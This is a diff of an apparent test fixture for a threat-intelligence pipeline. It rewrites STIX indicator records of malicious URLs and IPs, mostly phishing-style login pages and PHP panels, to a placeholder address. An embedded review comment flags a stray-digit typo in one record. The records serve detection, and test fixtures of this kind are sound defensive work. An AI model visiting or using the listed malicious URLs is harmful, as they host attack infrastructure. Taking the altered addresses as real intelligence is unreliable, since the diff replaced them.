 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_url: http://107.175.150.73/~giftioz/.golob/ds.php",
+ "name": "mal_url: http://89.160.20.156/~giftioz/.golob/ds.php",
 "description": "TS ID: 55295317584; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime",
 "modified": "2020-02-07T01:58:49.531Z",
 "valid_from": "2020-02-07T01:58:49.531Z",
@@ -18489,16 +18489,16 @@ "url": { "path": "/~giftioz/.golob/ds.php", "extension": "php", - "original": "http://107.175.150.73/~giftioz/.golob/ds.php", + "original": "http://89.160.20.156/~giftioz/.golob/ds.php", "scheme": "http", - "domain": "107.175.150.73", - "full": "http://107.175.150.73/~giftioz/.golob/ds.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/~giftioz/.golob/ds.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386787440Z", - "original": "{\"created\":\"2020-02-07T01:58:49.531Z\",\"description\":\"TS ID: 55295317584; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--e9848e5a-4cbf-4156-827d-b0e0e73d9f2e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T01:58:49.531Z\",\"name\":\"mal_url: http://107.175.150.73/~giftioz/.golob/ds.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://107.175.150.73/~giftioz/.golob/ds.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:58:49.531Z\"}", + "ingested": "2021-12-13T08:38:40.024774200Z", + "original": "{\"created\":\"2020-02-07T01:58:49.531Z\",\"description\":\"TS ID: 55295317584; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--e9848e5a-4cbf-4156-827d-b0e0e73d9f2e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T01:58:49.531Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.golob/ds.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.golob/ds.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:58:49.531Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -18516,7 +18516,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://107.175.150.73/~giftioz/.jonovis/xr.php", + "name": "mal_url: http://89.160.20.156/~giftioz/.jonovis/xr.php", "description": "TS ID: 55295317585; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", "modified": "2020-02-07T01:58:49.782Z", "valid_from": "2020-02-07T01:58:49.782Z", 
@@ -18541,16 +18541,16 @@ "url": { "path": "/~giftioz/.jonovis/xr.php", "extension": "php", - "original": "http://107.175.150.73/~giftioz/.jonovis/xr.php", + "original": "http://89.160.20.156/~giftioz/.jonovis/xr.php", "scheme": "http", - "domain": "107.175.150.73", - "full": "http://107.175.150.73/~giftioz/.jonovis/xr.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/~giftioz/.jonovis/xr.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386799422Z", - "original": "{\"created\":\"2020-02-07T01:58:49.782Z\",\"description\":\"TS ID: 55295317585; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--44a6ba7f-2847-45c5-b4f3-452582094240\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T01:58:49.782Z\",\"name\":\"mal_url: http://107.175.150.73/~giftioz/.jonovis/xr.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://107.175.150.73/~giftioz/.jonovis/xr.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:58:49.782Z\"}", + "ingested": "2021-12-13T08:38:40.024781500Z", + "original": "{\"created\":\"2020-02-07T01:58:49.782Z\",\"description\":\"TS ID: 55295317585; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--44a6ba7f-2847-45c5-b4f3-452582094240\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T01:58:49.782Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.jonovis/xr.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.jonovis/xr.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:58:49.782Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -18568,7 +18568,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://194.32.79.80/xcool!/admin.php", + "name": "mal_url: http://89.160.20.156/xcool!/admin.php", "description": "TS ID: 55295317581; iType: mal_url; State: active; Org: MVPS LTD; Source: CyberCrime", "modified": "2020-02-07T01:59:00.621Z", "valid_from": "2020-02-07T01:59:00.621Z", 
@@ -18593,16 +18593,16 @@ "url": { "path": "/xcool!/admin.php", "extension": "php", - "original": "http://194.32.79.80/xcool!/admin.php", + "original": "http://189.160.20.156/xcool!/admin.php", "scheme": "http", - "domain": "194.32.79.80", - "full": "http://194.32.79.80/xcool!/admin.php" + "domain": "189.160.20.156", + "full": "http://189.160.20.156/xcool!/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386818899Z", - "original": "{\"created\":\"2020-02-07T01:59:00.621Z\",\"description\":\"TS ID: 55295317581; iType: mal_url; State: active; Org: MVPS LTD; Source: CyberCrime\",\"id\":\"indicator--dad51188-cf4b-4585-8fe2-bfeb4ab3a864\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-07T01:59:00.621Z\",\"name\":\"mal_url: http://194.32.79.80/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://194.32.79.80/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:59:00.621Z\"}", + "ingested": "2021-12-13T08:38:40.024793300Z", + "original": "{\"created\":\"2020-02-07T01:59:00.621Z\",\"description\":\"TS ID: 55295317581; iType: mal_url; State: active; Org: MVPS LTD; Source: CyberCrime\",\"id\":\"indicator--dad51188-cf4b-4585-8fe2-bfeb4ab3a864\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-07T01:59:00.621Z\",\"name\":\"mal_url: http://89.160.20.156/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://189.160.20.156/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:59:00.621Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
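Review bot: The replacement address in this hunk carries a stray leading digit: `"original": "http://189.160.20.156/xcool!/admin.php"`, `"domain": "189.160.20.156"`, `"full": "http://189.160.20.156/xcool!/admin.php"` and the `pattern` inside `event.original` all read `189.160.20.156`, while the `name` in the same `event.original` string and every other hunk in this file use `89.160.20.156`. The `url.*` fields appear to follow the `pattern` value rather than `name`, so the expected output is self-consistent with the typo and the test will pass while asserting an address that is neither the one used across the rest of the fixture nor, presumably, one whose enrichment results are stable across test environments; the `name`/`pattern` mismatch inside a single indicator object is the visible symptom. Since this expected file is derived from a test input event that is not in this chunk, the correction belongs there (change the address to `89.160.20.156` and regenerate) rather than hand-editing these lines. The enclosing indicator object begins in the preceding hunk at `@@ -18568`.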
@@ -18620,7 +18620,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://107.175.150.73/~giftioz/.fotoci/ji.php", + "name": "mal_url: http://89.160.20.156/~giftioz/.fotoci/ji.php", "description": "TS ID: 55295317582; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", "modified": "2020-02-07T02:01:59.646Z", "valid_from": "2020-02-07T02:01:59.646Z", 
@@ -18645,16 +18645,16 @@ "url": { "path": "/~giftioz/.fotoci/ji.php", "extension": "php", - "original": "http://107.175.150.73/~giftioz/.fotoci/ji.php", + "original": "http://89.160.20.156/~giftioz/.fotoci/ji.php", "scheme": "http", - "domain": "107.175.150.73", - "full": "http://107.175.150.73/~giftioz/.fotoci/ji.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/~giftioz/.fotoci/ji.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386825842Z", - "original": "{\"created\":\"2020-02-07T02:01:59.646Z\",\"description\":\"TS ID: 55295317582; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--a8895396-ac11-49f3-bb81-6e854b871870\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T02:01:59.646Z\",\"name\":\"mal_url: http://107.175.150.73/~giftioz/.fotoci/ji.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://107.175.150.73/~giftioz/.fotoci/ji.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T02:01:59.646Z\"}", + "ingested": "2021-12-13T08:38:40.024800800Z", + "original": "{\"created\":\"2020-02-07T02:01:59.646Z\",\"description\":\"TS ID: 55295317582; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--a8895396-ac11-49f3-bb81-6e854b871870\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T02:01:59.646Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.fotoci/ji.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.fotoci/ji.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T02:01:59.646Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -18672,7 +18672,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://107.175.150.73/~giftioz/.hokbi/cv.php", + "name": "mal_url: http://89.160.20.156/~giftioz/.hokbi/cv.php", "description": "TS ID: 55295317583; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", "modified": "2020-02-07T02:02:24.529Z", "valid_from": "2020-02-07T02:02:24.529Z", 
@@ -18697,16 +18697,16 @@ "url": { "path": "/~giftioz/.hokbi/cv.php", "extension": "php", - "original": "http://107.175.150.73/~giftioz/.hokbi/cv.php", + "original": "http://89.160.20.156/~giftioz/.hokbi/cv.php", "scheme": "http", - "domain": "107.175.150.73", - "full": "http://107.175.150.73/~giftioz/.hokbi/cv.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/~giftioz/.hokbi/cv.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386831693Z", - "original": "{\"created\":\"2020-02-07T02:02:24.529Z\",\"description\":\"TS ID: 55295317583; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--2d0ab756-16e3-4679-86d9-b5ef1bc14a32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T02:02:24.529Z\",\"name\":\"mal_url: http://107.175.150.73/~giftioz/.hokbi/cv.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://107.175.150.73/~giftioz/.hokbi/cv.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T02:02:24.529Z\"}", + "ingested": "2021-12-13T08:38:40.024806100Z", + "original": "{\"created\":\"2020-02-07T02:02:24.529Z\",\"description\":\"TS ID: 55295317583; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--2d0ab756-16e3-4679-86d9-b5ef1bc14a32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T02:02:24.529Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.hokbi/cv.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.hokbi/cv.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T02:02:24.529Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -18724,7 +18724,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 91.215.169.50", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55298072069; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime", "modified": "2020-02-08T14:02:11.920Z", "valid_from": "2020-02-08T14:02:11.92Z", @@ -18746,12 +18746,12 @@ "first_seen": "2020-02-08T14:02:11.920Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "91.215.169.50" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386836732Z", - "original": "{\"created\":\"2020-02-08T14:02:11.92Z\",\"description\":\"TS ID: 55298072069; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--0e0304f5-9735-4c6d-a860-95633369db34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-22\"],\"modified\":\"2020-02-08T14:02:11.92Z\",\"name\":\"mal_ip: 91.215.169.50\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '91.215.169.50']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:11.92Z\"}", + "ingested": "2021-12-13T08:38:40.024830800Z", + "original": "{\"created\":\"2020-02-08T14:02:11.92Z\",\"description\":\"TS ID: 55298072069; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--0e0304f5-9735-4c6d-a860-95633369db34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-22\"],\"modified\":\"2020-02-08T14:02:11.92Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:11.92Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -18769,7 +18769,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 47.254.179.14", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55298070452; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime", "modified": "2020-02-08T14:02:14.399Z", "valid_from": "2020-02-08T14:02:14.399Z", @@ -18791,12 +18791,12 @@ "first_seen": "2020-02-08T14:02:14.399Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "47.254.179.14" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386841681Z", - "original": "{\"created\":\"2020-02-08T14:02:14.399Z\",\"description\":\"TS ID: 55298070452; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--7af00858-9e0a-437b-af35-a4ef0b6527a5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-02-08T14:02:14.399Z\",\"name\":\"mal_ip: 47.254.179.14\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '47.254.179.14']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:14.399Z\"}", + "ingested": "2021-12-13T08:38:40.024834800Z", + "original": "{\"created\":\"2020-02-08T14:02:14.399Z\",\"description\":\"TS ID: 55298070452; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--7af00858-9e0a-437b-af35-a4ef0b6527a5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-02-08T14:02:14.399Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:14.399Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -18846,7 +18846,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386846611Z", + "ingested": "2021-12-13T08:38:40.024839800Z", "original": "{\"created\":\"2020-02-08T14:02:17.271Z\",\"description\":\"TS ID: 55298068887; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--257cd2f9-ce06-4091-83e2-63d61b7e8bfa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-08T14:02:17.271Z\",\"name\":\"mal_url: http://smineolo39wings.in/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://smineolo39wings.in/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:17.271Z\"}", "category": "threat", "type": "indicator", @@ -18897,7 +18897,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386851199Z", + "ingested": "2021-12-13T08:38:40.024847200Z", "original": "{\"created\":\"2020-02-08T14:02:23Z\",\"description\":\"TS ID: 55298071788; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--8438ae84-2b7d-4fea-b1cd-fbec85ea3e58\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-08T14:02:23Z\",\"name\":\"mal_url: http://go.trust-oot.info/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://go.trust-oot.info/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:23Z\"}", "category": "threat", "type": "indicator", 
@@ -18916,7 +18916,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://178.62.186.112/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55298070914; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime", "modified": "2020-02-08T14:02:23.507Z", "valid_from": "2020-02-08T14:02:23.507Z", 
@@ -18940,16 +18940,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://178.62.186.112/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "178.62.186.112", - "full": "http://178.62.186.112/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386855698Z", - "original": "{\"created\":\"2020-02-08T14:02:23.507Z\",\"description\":\"TS ID: 55298070914; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime\",\"id\":\"indicator--7f6369a7-af79-45ca-96e4-3e5c309337de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-02-08T14:02:23.507Z\",\"name\":\"mal_url: http://178.62.186.112/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://178.62.186.112/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:23.507Z\"}", + "ingested": "2021-12-13T08:38:40.024875400Z", + "original": "{\"created\":\"2020-02-08T14:02:23.507Z\",\"description\":\"TS ID: 55298070914; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime\",\"id\":\"indicator--7f6369a7-af79-45ca-96e4-3e5c309337de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-02-08T14:02:23.507Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:23.507Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -18967,7 +18967,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 5.188.231.89", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55298068879; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-08T14:02:23.547Z", "valid_from": "2020-02-08T14:02:23.547Z", @@ -18989,12 +18989,12 @@ "first_seen": "2020-02-08T14:02:23.547Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "5.188.231.89" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386860176Z", - "original": "{\"created\":\"2020-02-08T14:02:23.547Z\",\"description\":\"TS ID: 55298068879; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--e1a9f3d2-0a84-4814-bac9-c9e60ad73cca\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-08T14:02:23.547Z\",\"name\":\"mal_ip: 5.188.231.89\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '5.188.231.89']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:23.547Z\"}", + "ingested": "2021-12-13T08:38:40.024879900Z", + "original": "{\"created\":\"2020-02-08T14:02:23.547Z\",\"description\":\"TS ID: 55298068879; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--e1a9f3d2-0a84-4814-bac9-c9e60ad73cca\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-08T14:02:23.547Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:23.547Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -19044,7 +19044,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386864645Z", + "ingested": "2021-12-13T08:38:40.024883400Z", "original": "{\"created\":\"2020-02-08T14:02:33.679Z\",\"description\":\"TS ID: 55298069345; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--1aa4e592-6c78-43e8-b47c-2494a948d25c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-08T14:02:33.679Z\",\"name\":\"mal_url: http://f0391897.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391897.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:33.679Z\"}", "category": "threat", "type": "indicator", @@ -19063,7 +19063,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 190.14.38.202", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55298070323; iType: mal_ip; State: active; Org: Offshore Racks S.A; Source: CyberCrime", "modified": "2020-02-08T14:02:53.996Z", "valid_from": "2020-02-08T14:02:53.996Z", 
@@ -19085,12 +19085,12 @@ "first_seen": "2020-02-08T14:02:53.996Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "190.14.38.202" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386868782Z", - "original": "{\"created\":\"2020-02-08T14:02:53.996Z\",\"description\":\"TS ID: 55298070323; iType: mal_ip; State: active; Org: Offshore Racks S.A; Source: CyberCrime\",\"id\":\"indicator--0140ac57-a9a4-408a-9f53-f5b33f85dc80\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-02-08T14:02:53.996Z\",\"name\":\"mal_ip: 190.14.38.202\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '190.14.38.202']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:53.996Z\"}", + "ingested": "2021-12-13T08:38:40.024888700Z", + "original": "{\"created\":\"2020-02-08T14:02:53.996Z\",\"description\":\"TS ID: 55298070323; iType: mal_ip; State: active; Org: Offshore Racks S.A; Source: CyberCrime\",\"id\":\"indicator--0140ac57-a9a4-408a-9f53-f5b33f85dc80\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-02-08T14:02:53.996Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:53.996Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -19140,7 +19140,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386873902Z", + "ingested": "2021-12-13T08:38:40.024894900Z", "original": "{\"created\":\"2020-02-08T14:02:57.507Z\",\"description\":\"TS ID: 55298070037; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--46c21251-c655-40c1-896d-2f4712091b7b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-08T14:02:57.507Z\",\"name\":\"mal_url: http://nikitakoteqka1.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nikitakoteqka1.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:57.507Z\"}", "category": "threat", "type": "indicator", @@ -19192,7 +19192,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386878180Z", + "ingested": "2021-12-13T08:38:40.024919200Z", "original": "{\"created\":\"2020-02-08T14:02:59.236Z\",\"description\":\"TS ID: 55298072047; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--7921e9e8-393c-4b0d-888f-bea034112f06\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-08T14:02:59.236Z\",\"name\":\"mal_url: http://xgkxc.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xgkxc.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.236Z\"}", "category": "threat", "type": "indicator", 
@@ -19243,7 +19243,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386882468Z", + "ingested": "2021-12-13T08:38:40.024949900Z", "original": "{\"created\":\"2020-02-08T14:02:59.246Z\",\"description\":\"TS ID: 55298071436; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--a59774c5-c288-44a0-9eab-28d93c5d0ab4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:02:59.246Z\",\"name\":\"mal_url: http://100stuff.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://100stuff.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.246Z\"}", "category": "threat", "type": "indicator", @@ -19262,7 +19262,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 81.4.100.75", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55298071076; iType: mal_ip; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime", "modified": "2020-02-08T14:02:59.310Z", "valid_from": "2020-02-08T14:02:59.31Z", 
